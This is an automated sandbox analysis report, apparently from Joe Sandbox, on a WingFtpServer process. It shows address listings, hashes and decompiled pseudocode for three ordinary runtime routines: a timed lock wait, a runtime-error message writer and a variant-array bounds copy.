                                                                                                                                                                                                  0x03aa619e
                                                                                                                                                                                                  0x03aa60d2
                                                                                                                                                                                                  0x03aa60d2
                                                                                                                                                                                                  0x03aa60d7
                                                                                                                                                                                                  0x03aa60df
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa60e1
                                                                                                                                                                                                  0x03aa60e3
                                                                                                                                                                                                  0x03aa60ea
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa60ec
                                                                                                                                                                                                  0x03aa60f0
                                                                                                                                                                                                  0x03aa60f5
                                                                                                                                                                                                  0x03aa60f6
                                                                                                                                                                                                  0x03aa60fc
                                                                                                                                                                                                  0x03aa6104
                                                                                                                                                                                                  0x03aa610a
                                                                                                                                                                                                  0x03aa610f
                                                                                                                                                                                                  0x03aa6110
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6110
                                                                                                                                                                                                  0x03aa6104
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa60ea
                                                                                                                                                                                                  0x03aa6119
                                                                                                                                                                                                  0x03aa611c
                                                                                                                                                                                                  0x03aa611f
                                                                                                                                                                                                  0x03aa6121
                                                                                                                                                                                                  0x03aa61a1
                                                                                                                                                                                                  0x03aa61a1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6123
                                                                                                                                                                                                  0x03aa6123
                                                                                                                                                                                                  0x03aa6126
                                                                                                                                                                                                  0x03aa6129
                                                                                                                                                                                                  0x03aa612b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa612b
                                                                                                                                                                                                  0x03aa6121
                                                                                                                                                                                                  0x03aa60d0
                                                                                                                                                                                                  0x03aa60c3
                                                                                                                                                                                                  0x03aa5fa1
                                                                                                                                                                                                  0x03aa5fa4
                                                                                                                                                                                                  0x03aa5fa6
                                                                                                                                                                                                  0x03aa5fb0
                                                                                                                                                                                                  0x03aa5fb6
                                                                                                                                                                                                  0x03aa5fcd
                                                                                                                                                                                                  0x03aa5fcd
                                                                                                                                                                                                  0x03aa5fd9
                                                                                                                                                                                                  0x03aa5fdf
                                                                                                                                                                                                  0x03aa5fe1
                                                                                                                                                                                                  0x03aa5fe8
                                                                                                                                                                                                  0x03aa5fea
                                                                                                                                                                                                  0x03aa5fef
                                                                                                                                                                                                  0x03aa5ff7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5ff9
                                                                                                                                                                                                  0x03aa5ffb
                                                                                                                                                                                                  0x03aa6002
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6004
                                                                                                                                                                                                  0x03aa6007
                                                                                                                                                                                                  0x03aa600c
                                                                                                                                                                                                  0x03aa6012
                                                                                                                                                                                                  0x03aa601a
                                                                                                                                                                                                  0x03aa601f
                                                                                                                                                                                                  0x03aa6024
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6024
                                                                                                                                                                                                  0x03aa601a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6002
                                                                                                                                                                                                  0x03aa602d
                                                                                                                                                                                                  0x03aa602d
                                                                                                                                                                                                  0x03aa602d
                                                                                                                                                                                                  0x03aa6032
                                                                                                                                                                                                  0x03aa6035
                                                                                                                                                                                                  0x03aa6037
                                                                                                                                                                                                  0x03aa603a
                                                                                                                                                                                                  0x03aa603d
                                                                                                                                                                                                  0x03aa6048
                                                                                                                                                                                                  0x03aa604a
                                                                                                                                                                                                  0x03aa604d
                                                                                                                                                                                                  0x03aa604f
                                                                                                                                                                                                  0x03aa6051
                                                                                                                                                                                                  0x03aa6057
                                                                                                                                                                                                  0x03aa6059
                                                                                                                                                                                                  0x03aa6059
                                                                                                                                                                                                  0x03aa603f
                                                                                                                                                                                                  0x03aa6042
                                                                                                                                                                                                  0x03aa6042
                                                                                                                                                                                                  0x03aa605e
                                                                                                                                                                                                  0x03aa6064
                                                                                                                                                                                                  0x03aa6068
                                                                                                                                                                                                  0x03aa606e
                                                                                                                                                                                                  0x03aa6075
                                                                                                                                                                                                  0x03aa6075
                                                                                                                                                                                                  0x03aa607a
                                                                                                                                                                                                  0x03aa6087
                                                                                                                                                                                                  0x03aa5fb8
                                                                                                                                                                                                  0x03aa5fb8
                                                                                                                                                                                                  0x03aa5fbe
                                                                                                                                                                                                  0x03aa6088
                                                                                                                                                                                                  0x03aa608c
                                                                                                                                                                                                  0x03aa6091
                                                                                                                                                                                                  0x03aa6093
                                                                                                                                                                                                  0x03aa6095
                                                                                                                                                                                                  0x03aa609d
                                                                                                                                                                                                  0x03aa60a4
                                                                                                                                                                                                  0x03aa60a9
                                                                                                                                                                                                  0x03aa60a9
                                                                                                                                                                                                  0x03aa60af
                                                                                                                                                                                                  0x03aa5fc4
                                                                                                                                                                                                  0x03aa5fc4
                                                                                                                                                                                                  0x03aa5fc9
                                                                                                                                                                                                  0x03aa5fcb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5fcb
                                                                                                                                                                                                  0x03aa5fbe
                                                                                                                                                                                                  0x03aa5fa8
                                                                                                                                                                                                  0x03aa5fa8
                                                                                                                                                                                                  0x03aa5fac
                                                                                                                                                                                                  0x03aa5fac
                                                                                                                                                                                                  0x03aa5fa6
                                                                                                                                                                                                  0x03aa5f9b
                                                                                                                                                                                                  0x03aa5ef8
                                                                                                                                                                                                  0x03aa5ef8
                                                                                                                                                                                                  0x03aa5efa
                                                                                                                                                                                                  0x03aa5efe
                                                                                                                                                                                                  0x03aa5f01
                                                                                                                                                                                                  0x03aa5f03
                                                                                                                                                                                                  0x03aa5f3c
                                                                                                                                                                                                  0x03aa5f40
                                                                                                                                                                                                  0x03aa5f41
                                                                                                                                                                                                  0x03aa5f43
                                                                                                                                                                                                  0x03aa5f45
                                                                                                                                                                                                  0x03aa5f47
                                                                                                                                                                                                  0x03aa5f4a
                                                                                                                                                                                                  0x03aa5f4c
                                                                                                                                                                                                  0x03aa5f4e
                                                                                                                                                                                                  0x03aa5f53
                                                                                                                                                                                                  0x03aa5f55
                                                                                                                                                                                                  0x03aa5f57
                                                                                                                                                                                                  0x03aa5f5d
                                                                                                                                                                                                  0x03aa5f5f
                                                                                                                                                                                                  0x03aa5f5f
                                                                                                                                                                                                  0x03aa5f66
                                                                                                                                                                                                  0x03aa5f66
                                                                                                                                                                                                  0x03aa5f69
                                                                                                                                                                                                  0x03aa5f6b
                                                                                                                                                                                                  0x03aa5f74
                                                                                                                                                                                                  0x03aa5f79
                                                                                                                                                                                                  0x03aa5f79
                                                                                                                                                                                                  0x03aa5f7b
                                                                                                                                                                                                  0x03aa5f7c
                                                                                                                                                                                                  0x03aa5f7d
                                                                                                                                                                                                  0x03aa5f7e
                                                                                                                                                                                                  0x03aa5f05
                                                                                                                                                                                                  0x03aa5f05
                                                                                                                                                                                                  0x03aa5f0c
                                                                                                                                                                                                  0x03aa5f0e
                                                                                                                                                                                                  0x03aa5f14
                                                                                                                                                                                                  0x03aa5f16
                                                                                                                                                                                                  0x03aa5f18
                                                                                                                                                                                                  0x03aa5f1d
                                                                                                                                                                                                  0x03aa5f1f
                                                                                                                                                                                                  0x03aa5f21
                                                                                                                                                                                                  0x03aa5f23
                                                                                                                                                                                                  0x03aa5f25
                                                                                                                                                                                                  0x03aa5f30
                                                                                                                                                                                                  0x03aa5f35
                                                                                                                                                                                                  0x03aa5f35
                                                                                                                                                                                                  0x03aa5f37
                                                                                                                                                                                                  0x03aa5f38
                                                                                                                                                                                                  0x03aa5f39
                                                                                                                                                                                                  0x03aa5f10
                                                                                                                                                                                                  0x03aa5f10
                                                                                                                                                                                                  0x03aa5f11
                                                                                                                                                                                                  0x03aa5f12
                                                                                                                                                                                                  0x03aa5f12
                                                                                                                                                                                                  0x03aa5f0e
                                                                                                                                                                                                  0x03aa5f03

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8830e6a50988126fc14e1d336d3bc8dabace0d535a7b58d3a04d6c91f2c180e3
                                                                                                                                                                                                  • Instruction ID: 5f83bd02ee955895c0e1c3cf64cff15ee55f618e072c44b4c9ba827ec4d8e1ab
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8830e6a50988126fc14e1d336d3bc8dabace0d535a7b58d3a04d6c91f2c180e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7C10267B00B000BD714EA7D9D8436EB7869B86221F1C827FE694CF796DB74C8498758
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA8728 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                                                  			E03AA8728(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E03AA8BE8(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E03AA892C(_t71);
								_t57 =  *0x3bd38fc; // 0x3bd06c4
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E03AA83E4( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                                                                                                                                                  0x03aa872f
                                                                                                                                                                                                  0x03aa8731
                                                                                                                                                                                                  0x03aa8733
                                                                                                                                                                                                  0x03aa8736
                                                                                                                                                                                                  0x03aa8736
                                                                                                                                                                                                  0x03aa873d
                                                                                                                                                                                                  0x03aa8744
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8752
                                                                                                                                                                                                  0x03aa8759
                                                                                                                                                                                                  0x03aa87f1
                                                                                                                                                                                                  0x03aa87f1
                                                                                                                                                                                                  0x03aa87f1
                                                                                                                                                                                                  0x03aa87f5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8800
                                                                                                                                                                                                  0x03aa8806
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8808
                                                                                                                                                                                                  0x03aa8808
                                                                                                                                                                                                  0x03aa880d
                                                                                                                                                                                                  0x03aa8813
                                                                                                                                                                                                  0x03aa881a
                                                                                                                                                                                                  0x03aa8824
                                                                                                                                                                                                  0x03aa8829
                                                                                                                                                                                                  0x03aa8830
                                                                                                                                                                                                  0x03aa8837
                                                                                                                                                                                                  0x03aa8845
                                                                                                                                                                                                  0x03aa8853
                                                                                                                                                                                                  0x03aa8847
                                                                                                                                                                                                  0x03aa884f
                                                                                                                                                                                                  0x03aa884f
                                                                                                                                                                                                  0x03aa8845
                                                                                                                                                                                                  0x03aa8859
                                                                                                                                                                                                  0x03aa887b
                                                                                                                                                                                                  0x03aa8884
                                                                                                                                                                                                  0x03aa8888
                                                                                                                                                                                                  0x03aa888c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa885b
                                                                                                                                                                                                  0x03aa885b
                                                                                                                                                                                                  0x03aa8860
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa886c
                                                                                                                                                                                                  0x03aa8872
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8874
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8874
                                                                                                                                                                                                  0x03aa885b
                                                                                                                                                                                                  0x03aa8891
                                                                                                                                                                                                  0x03aa8891
                                                                                                                                                                                                  0x03aa88a0
                                                                                                                                                                                                  0x03aa88a7
                                                                                                                                                                                                  0x03aa88aa
                                                                                                                                                                                                  0x03aa88aa
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa88a0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa87f1
                                                                                                                                                                                                  0x03aa8764
                                                                                                                                                                                                  0x03aa876a
                                                                                                                                                                                                  0x03aa8770
                                                                                                                                                                                                  0x03aa87cc
                                                                                                                                                                                                  0x03aa87cf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa87d6
                                                                                                                                                                                                  0x03aa87de
                                                                                                                                                                                                  0x03aa87e4
                                                                                                                                                                                                  0x03aa87ef
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa87ef
                                                                                                                                                                                                  0x03aa87e6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa87e6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8772
                                                                                                                                                                                                  0x03aa8775
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8784
                                                                                                                                                                                                  0x03aa8784
                                                                                                                                                                                                  0x03aa8784
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa878d
                                                                                                                                                                                                  0x03aa8790
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa8795
                                                                                                                                                                                                  0x03aa87be
                                                                                                                                                                                                  0x03aa87c2
                                                                                                                                                                                                  0x03aa87c7
                                                                                                                                                                                                  0x03aa87ca
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa87ca
                                                                                                                                                                                                  0x03aa879e
                                                                                                                                                                                                  0x03aa87a4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa87ab
                                                                                                                                                                                                  0x03aa87ae
                                                                                                                                                                                                  0x03aa87b5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa87b5
                                                                                                                                                                                                  0x03aa88b1
                                                                                                                                                                                                  0x03aa88bc

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 03AA8BE8: GetCurrentThreadId.KERNEL32 ref: 03AA8BEB
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 03AA875F
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 03AA8777
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 03AA87A6
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 03AA87D1
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 03AA8808
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 03AA8832
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 03AA88A2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountTick$CurrentThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3968769311-0
                                                                                                                                                                                                  • Opcode ID: 06c56baed1da8e12bc67d7eea82af94fcd2fb01bd96257ac2bf2e4aa93d27099
                                                                                                                                                                                                  • Instruction ID: 08fee1fc9610ec0ce595630ff73005146180aad846d2e9c0f5a6cfca372dbf02
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c56baed1da8e12bc67d7eea82af94fcd2fb01bd96257ac2bf2e4aa93d27099
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B41A236608B519ED321EF7CC58432EBFD9AF85390F18896ED4D88B381EB79C4858752
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA98B4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 43%
                                                                                                                                                                                                  			E03AA98B4(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x3bd305c == 0) {
					if( *0x3bce02e == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L03AA520C();
					}
					return _t3;
				} else {
					if( *0x3bd3348 == 0xd7b2 &&  *0x3bd3350 > 0) {
						 *0x3bd3360();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E03AAA510(0x3aa9948);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                                                                                                                                                  0x03aa98bc
                                                                                                                                                                                                  0x03aa9922
                                                                                                                                                                                                  0x03aa9924
                                                                                                                                                                                                  0x03aa9926
                                                                                                                                                                                                  0x03aa992b
                                                                                                                                                                                                  0x03aa9930
                                                                                                                                                                                                  0x03aa9932
                                                                                                                                                                                                  0x03aa9932
                                                                                                                                                                                                  0x03aa9938
                                                                                                                                                                                                  0x03aa98be
                                                                                                                                                                                                  0x03aa98c7
                                                                                                                                                                                                  0x03aa98d7
                                                                                                                                                                                                  0x03aa98d7
                                                                                                                                                                                                  0x03aa98f3
                                                                                                                                                                                                  0x03aa9906
                                                                                                                                                                                                  0x03aa991a
                                                                                                                                                                                                  0x03aa991a

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03AA996C,?,?,?,03AA9A86,03AA6F9F,03AA6FE6,?,?,03AA6FFF), ref: 03AA98ED
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03AA996C,?,?,?,03AA9A86,03AA6F9F,03AA6FE6,?,?), ref: 03AA98F3
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03AA996C,?,?,?), ref: 03AA990E
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03AA996C,?,?), ref: 03AA9914
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileHandleWrite
                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                  • API String ID: 3320372497-2970929446
                                                                                                                                                                                                  • Opcode ID: 0a4bba1c3a5ee6b389d493486ea3a3cd3216c26d336d34d745d63471b2abc556
                                                                                                                                                                                                  • Instruction ID: bd01e7c86ada15d2a649af149174f3208b9c0a2f03ffed3ba3ab30217e4fd2fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a4bba1c3a5ee6b389d493486ea3a3cd3216c26d336d34d745d63471b2abc556
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F0286B944748BCE620F36C5F02F2E22CC5341E29F28015FB1A45FCDAE7F081809762
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AD2258 Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                                                  			E03AD2258(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E03AD1A04(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L03ACFB90();
					return E03AD1A04(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L03AD0164();
						_t123 = _t64;
						if(_t123 == 0) {
							E03AD175C(_t110);
						}
						E03AD1CA0(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E03AD21D0(_v788 - 1, _t125) != 0) {
								L03AD017C();
								E03AD1A04(_v792);
								L03AD017C();
								E03AD1A04( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E03AD2200(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L03AD016C();
							E03AD1A04(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L03AD0174();
							E03AD1A04(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                                                                                                                                                  0x03ad2258
                                                                                                                                                                                                  0x03ad2264
                                                                                                                                                                                                  0x03ad226a
                                                                                                                                                                                                  0x03ad2270
                                                                                                                                                                                                  0x03ad2280
                                                                                                                                                                                                  0x03ad2287
                                                                                                                                                                                                  0x03ad2287
                                                                                                                                                                                                  0x03ad2292
                                                                                                                                                                                                  0x03ad22a0
                                                                                                                                                                                                  0x03ad242b
                                                                                                                                                                                                  0x03ad2432
                                                                                                                                                                                                  0x03ad2433
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad22a6
                                                                                                                                                                                                  0x03ad22a9
                                                                                                                                                                                                  0x03ad22c7
                                                                                                                                                                                                  0x03ad22ab
                                                                                                                                                                                                  0x03ad22b6
